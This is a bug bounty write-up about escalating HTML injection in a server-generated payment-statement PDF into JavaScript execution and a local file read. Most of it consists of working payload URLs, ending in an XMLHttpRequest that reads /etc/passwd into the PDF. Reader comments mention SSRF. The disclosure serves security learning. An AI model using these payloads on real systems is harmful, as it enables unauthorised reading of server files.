Local File Read via XSS in Dynamically Generated PDF


Hello Hunters,
                        This time I am writing about a Vulnerability found in another private program(xyz.com) on Bugcrowd which at first I thought wasn't much harmful(P4) but later escalated it to a P1.

While browsing the Application I came across an endpoint which allowed us to download some kind of Payment Statements as PDF.

The URL looked like this


I saw that the Value of utr number is reflected inside the PDF file that got downloaded so I wrote some HTML in utrnumber parameter as "><S>aaa 

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><S>aaa &date=2017-08-11&settlement_type=all&advice_id=undefined

Upon opening this PDF I found that the HTML was rendered and could be seen in PDF. This kind of vulnerability usually leads to XSS but this time it was inside a PDF which was being generated dynamically.
If you want to learn more about XSS then I advise to checkout this great intro on XSS: https://www.aptive.co.uk/blog/xss-cross-site-scripting/

I tried if I could use an iframe and load internal domains in the frame or if I could iframe file:///etc/passwd but none of the tricks worked! also, I wasn't able to iframe external domains.

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=2017-08-11&settlement_type=all&advice_id=undefined

But, from now I didn't know if I could go further because I wasn't sure if javascript could be executed like this in PDF.So after playing around a lot I found that we could execute javascript with the help of DOM Manipulation

<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script> 

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script>&date=2017-08-11&settlement_type=all&advice_id=undefined

and Upon downloading PDF I found that it contained the "aaaa" :D

also sometime later, I found that I could also use document.write() function to show results more easily.

<img src=x onerror=document.write('aaaa')>

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa')>&date=2017-08-11&settlement_type=all&advice_id=undefined

after this I checked the window.location of where this javascript is executed and to my surprise it was executing in file:// origin on the Server

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa'%2bwindow.location)>&date=2017-08-11&settlement_type=all&advice_id=undefined

Now since its executing on file://, I tried if we could access file:///etc/passwd via XHR(XMLHttpRequest), I wasn't sure myself.

x=new XMLHttpRequest;

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=2017-08-11&settlement_type=all&advice_id=undefined

and then you know ;) 

so That was it, XSS in Server Side Generated PDFs to Local File Read! 

However, it took :P me some time to figure this You could see the number of PDFs I had to download: 

Rahul Maini


  1. Nice, I use this today in an engagement. Awesome finding

    1. Does this lead to probably ssrf too?

    2. Thanks :) Actually yea it leads to a SSRF but since it was executing under file:/// , and I don't may be thats why I wasn't able to load/iframe any of the http:// origin but should work in other cases like you might check this awesome blogpost by @bbuerhaus https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/

    3. hi
      i found same case and there is ssrf and server downloads file from my http server. But problem is that i am not able to exploit LFI

  2. need ur help can i contact u

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